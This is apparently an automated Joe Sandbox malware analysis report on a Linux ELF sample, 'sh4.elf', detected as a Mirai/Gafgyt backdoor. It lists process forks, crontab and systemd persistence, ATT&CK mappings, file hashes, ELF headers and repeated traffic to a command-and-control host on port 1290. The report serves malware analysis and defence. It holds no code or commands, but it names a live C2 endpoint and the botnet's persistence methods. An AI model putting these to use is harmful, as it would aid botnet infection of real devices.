Linux
Analysis Report
sh4.elf
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1558941 |
Start date and time: | 2024-11-20 01:00:09 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 19s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | sh4.elf |
Detection: | MAL |
Classification: | mal68.troj.linELF@0/4@1/0 |
Command: | /tmp/sh4.elf |
PID: | 6263 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | we kinda rocking ngl |
Standard Error: |
- system is lnxubuntu20
- sh4.elf New Fork (PID: 6265, Parent: 6263)
- sh4.elf New Fork (PID: 6267, Parent: 6265)
- sh4.elf New Fork (PID: 6271, Parent: 6265)
- sh4.elf New Fork (PID: 6273, Parent: 6265)
- sh4.elf New Fork (PID: 6275, Parent: 6265)
- sh New Fork (PID: 6277, Parent: 6275)
- sh New Fork (PID: 6279, Parent: 6277)
- sh New Fork (PID: 6280, Parent: 6277)
- sh New Fork (PID: 6281, Parent: 6277)
- sh New Fork (PID: 6282, Parent: 6277)
- sh New Fork (PID: 6286, Parent: 6277)
- sh New Fork (PID: 6278, Parent: 6275)
- sh4.elf New Fork (PID: 6287, Parent: 6265)
- sh New Fork (PID: 6289, Parent: 6287)
- systemd New Fork (PID: 6291, Parent: 6290)
- dash New Fork (PID: 6306, Parent: 4331)
- dash New Fork (PID: 6307, Parent: 4331)
- cleanup
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | ReversingLabs: |
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: |
Source: | Reads hosts file: | Jump to behavior |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File written: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | Directory: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior | ||
Source: | Chmod executable: | Jump to behavior |
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior |
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 File and Directory Permissions Modification | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 1 Hidden Files and Directories | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Scripting | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
24% | ReversingLabs | Linux.Backdoor.Gafgyt | ||
100% | Avira | EXP/ELF.Mirai.W |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
host.zopz-api.com | 172.111.38.48 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
34.249.145.219 | unknown | United States | 16509 | AMAZON-02US | false | |
172.111.38.48 | host.zopz-api.com | Reserved | 54540 | INCERO-HVVCUS | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
34.249.145.219 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai | Browse | |||
172.111.38.48 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
109.202.202.202 | Get hash | malicious | Unknown | Browse |
| |
91.189.91.42 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse | |||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse | |||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
host.zopz-api.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
INCERO-HVVCUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | SystemBC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
INIT7CH | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
AMAZON-02US | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Amadey, Stealc, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
|
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/sh4.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 178 |
Entropy (8bit): | 4.358630015292201 |
Encrypted: | false |
SSDEEP: | 3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL |
MD5: | C3685F292213652676F734AB36C060EE |
SHA1: | 1D05F7F6302EC60E7990DE4BBE9180C149EFC731 |
SHA-256: | D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C |
SHA-512: | 7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/sh4.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 356 |
Entropy (8bit): | 4.9110117370593995 |
Encrypted: | false |
SSDEEP: | 6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7 |
MD5: | F03C70CD4C61A1852F9E19B8FB0D639C |
SHA1: | A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008 |
SHA-256: | AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90 |
SHA-512: | 6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 235 |
Entropy (8bit): | 5.096705576725245 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQLv5UZHGMQ5UYLtCFt3HY8jsHB:8QjHig898eHLUHY8mB |
MD5: | EE376E8DDA98DFB5BFD3968F9C4BCECD |
SHA1: | 46245E3C67282047008F316830D741AB02462A79 |
SHA-256: | 7D1AB0868EBD5F48D8FEAA69DF735C4BB59198F805BD4D46F3704D2F66FA4F49 |
SHA-512: | 81873155427D9AD2669596EA1DEE1F5B87A7AA57537FF4C7D501D2EA5316CCDD9535815E57DCFEC85DD585916DEC537C797586A9194C0F82728BB20EF600504F |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.865595055633762 |
TrID: |
|
File name: | sh4.elf |
File size: | 67'400 bytes |
MD5: | 16fb41b9eb62b0706fd7824ae6eb8d8d |
SHA1: | 7c99313b0e075431d9b3ee50ecb7f1997ec2cb24 |
SHA256: | 3089adf47259ddf51c16169c6abdd428e30f1a43fe129f56b416977652bfe84a |
SHA512: | 032511c4dbe38e0b1345186900ad3b2e9a286edde415e13ec3bc2b4717e6566c9f730bbfa84c34c5a5ba09a525c552d1911b4f814840d10f79863431311c85e3 |
SSDEEP: | 1536:XTusaMwtrtW+bhFQ5JOdUnHKvH71PUjxCVVLw/o:Djr4Wgh56nqvJUjx9/o |
TLSH: | 35633A27EA169F46C45760F0A5F28E740B53FC6949630EFAA9A2EEE58143DDCF1043B4 |
File Content Preview: | .ELF..............*.......@.4...........4. ...(...............@...@...........................A...A......f..........Q.td............................././"O.n........#.*@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q. |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 66840 |
Section Header Size: | 40 |
Number of Section Headers: | 14 |
Header String Table Index: | 13 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x400094 | 0x94 | 0x30 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x4000e0 | 0xe0 | 0xdba0 | 0x0 | 0x6 | AX | 0 | 0 | 32 |
.fini | PROGBITS | 0x40dc80 | 0xdc80 | 0x24 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x40dca4 | 0xdca4 | 0x1704 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.eh_frame | PROGBITS | 0x40f3a8 | 0xf3a8 | 0x4 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ctors | PROGBITS | 0x41f3ac | 0xf3ac | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x41f3b4 | 0xf3b4 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.jcr | PROGBITS | 0x41f3bc | 0xf3bc | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x41f3c0 | 0xf3c0 | 0x390 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.got | PROGBITS | 0x41f750 | 0xf750 | 0x10 | 0x4 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x41f760 | 0xf760 | 0x630c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.comment | PROGBITS | 0x0 | 0xf760 | 0xd5c | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x104bc | 0x5b | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x400000 | 0x400000 | 0xf3ac | 0xf3ac | 6.9095 | 0x5 | R E | 0x10000 | .init .text .fini .rodata .eh_frame | |
LOAD | 0xf3ac | 0x41f3ac | 0x41f3ac | 0x3b4 | 0x66c0 | 3.0735 | 0x6 | RW | 0x10000 | .ctors .dtors .jcr .data .got .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 01:01:27.320657969 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Nov 20, 2024 01:01:32.657644033 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:32.662590027 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:32.662686110 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:32.665358067 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:32.670193911 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:33.145284891 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:33.145370960 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:37.555210114 CET | 443 | 39254 | 34.249.145.219 | 192.168.2.23 |
Nov 20, 2024 01:01:37.555408001 CET | 39254 | 443 | 192.168.2.23 | 34.249.145.219 |
Nov 20, 2024 01:01:37.560251951 CET | 443 | 39254 | 34.249.145.219 | 192.168.2.23 |
Nov 20, 2024 01:01:38.145885944 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:38.145948887 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:38.146104097 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:38.150904894 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:41.654611111 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Nov 20, 2024 01:01:43.146884918 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:43.146979094 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:43.147109985 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:43.151881933 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:43.151935101 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:43.156764030 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:47.797693968 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Nov 20, 2024 01:01:48.215354919 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:48.215425968 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:48.215468884 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:48.220393896 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:48.220455885 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:48.225374937 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:53.217497110 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:53.217618942 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:53.222609997 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:53.222664118 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:53.227571964 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:58.148996115 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:58.149152040 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:58.154041052 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:01:58.154094934 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:01:58.159040928 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:03.150079012 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:03.150213957 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:03.155220985 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:03.155296087 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:03.160243034 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:08.150274992 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:08.150433064 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:08.155344963 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:08.155427933 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:08.160342932 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:13.150444984 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:13.150589943 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:13.155538082 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:13.155610085 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:13.160502911 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:18.151145935 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:18.151376963 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:18.156415939 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:18.156588078 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:18.161510944 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:23.152077913 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:23.152282953 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:23.157345057 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:23.157437086 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:23.162283897 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:28.153321028 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:28.153609037 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:28.158545017 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:28.158637047 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:28.163484097 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:28.752159119 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Nov 20, 2024 01:02:33.154023886 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:33.154237986 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:33.159219027 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:33.159277916 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:33.164200068 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:38.259569883 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:38.259784937 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:38.264830112 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:38.265007973 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:38.270004034 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:43.156738043 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:43.156928062 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:43.162266970 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:43.162354946 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:43.167226076 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:48.156054020 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:48.156289101 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:48.161135912 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:48.161214113 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:48.166038036 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:53.157166004 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:53.157548904 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:53.162662029 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:53.162755966 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:53.167633057 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:58.160672903 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:58.161062002 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:58.166008949 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:02:58.166094065 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:02:58.170969963 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:03.158404112 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:03.158771038 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:03.163728952 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:03.163814068 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:03.168661118 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:08.159226894 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:08.159512997 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:08.164479017 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:08.164546967 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:08.169469118 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:13.160242081 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:13.160397053 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:13.165301085 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:13.165406942 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:13.170224905 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:18.181551933 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:18.181797028 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:18.186763048 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:18.186861038 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
Nov 20, 2024 01:03:18.191781998 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:23.161518097 CET | 1290 | 59274 | 172.111.38.48 | 192.168.2.23 |
Nov 20, 2024 01:03:23.161756992 CET | 59274 | 1290 | 192.168.2.23 | 172.111.38.48 |
